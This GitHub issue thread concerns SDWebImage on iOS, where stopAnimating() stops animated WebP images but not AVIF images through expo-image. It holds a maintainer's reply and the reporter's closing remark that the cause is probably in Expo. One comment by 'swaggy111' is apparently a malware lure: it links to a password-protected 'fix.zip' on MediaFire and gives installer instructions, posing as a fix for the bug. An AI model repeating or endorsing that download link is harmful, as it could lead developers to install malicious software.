### ISSUE TITLE
AVIF: stopAnimating on iOS not working

### ISSUE THREAD

**Issue by andreialecu** [SDWebImage/SDWebImage#3745]
### New Issue Checklist

* [x] I have read and understood the [CONTRIBUTING guide](https://github.com/rs/SDWebImage/blob/master/.github/CONTRIBUTING.md)
* [x] I have read the [Documentation](http://cocoadocs.org/docsets/SDWebImage/)
* [x] I have searched for a similar issue in the [project](https://github.com/rs/SDWebImage/issues) and found none

### Issue Info

 Info                    | Value                               |
-------------------------|-------------------------------------|
 Platform Name           | ios
 Platform Version        | 17.5
 SDWebImage Version      | 5.19.1
 Integration Method      | cocoapods
 Xcode Version           | 15.4
 Repro rate              | 100%
 Repro with our demo prj | probably
 Demo project link       | https://snack.expo.dev/-nigAhGm4zHjdMK3opUrW

### Issue Description and Steps

Discovered at https://github.com/expo/expo/issues/31176

See the expo snack at https://snack.expo.dev/-nigAhGm4zHjdMK3opUrW. You can stop animating an animated webp, but not an AVIF.

`expo-image` uses SDWebImage to just call `stopAnimating()` here: https://github.com/expo/expo/blob/1fe71d007c5c5aab676e46257a90727483543bc5/packages/expo-image/ios/ImageModule.swift#L111

**Comment by andreialecu** [comment]
Video:

https://github.com/user-attachments/assets/3e7e417f-0c57-4ab6-ba43-212d093e58b8

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dreampiggy** [comment]
The format (like AVIF or AWebP or GIF) should not effect the start/stop logic. It's shared by all animated format


I guess some internal changes breaks SDAnimatedView's logic ? (Did `expo` use this class?)

**Comment by andreialecu** [comment]
On a side note, I noticed that having 3 AVIF animations simultaneously completely wrecks app performance on an iPhone 15 Pro Max. I'm not sure if that's what is expected.

**Comment by andreialecu** [comment]
Upon further investigation this may be an Expo issue. Closing for now. Thanks!
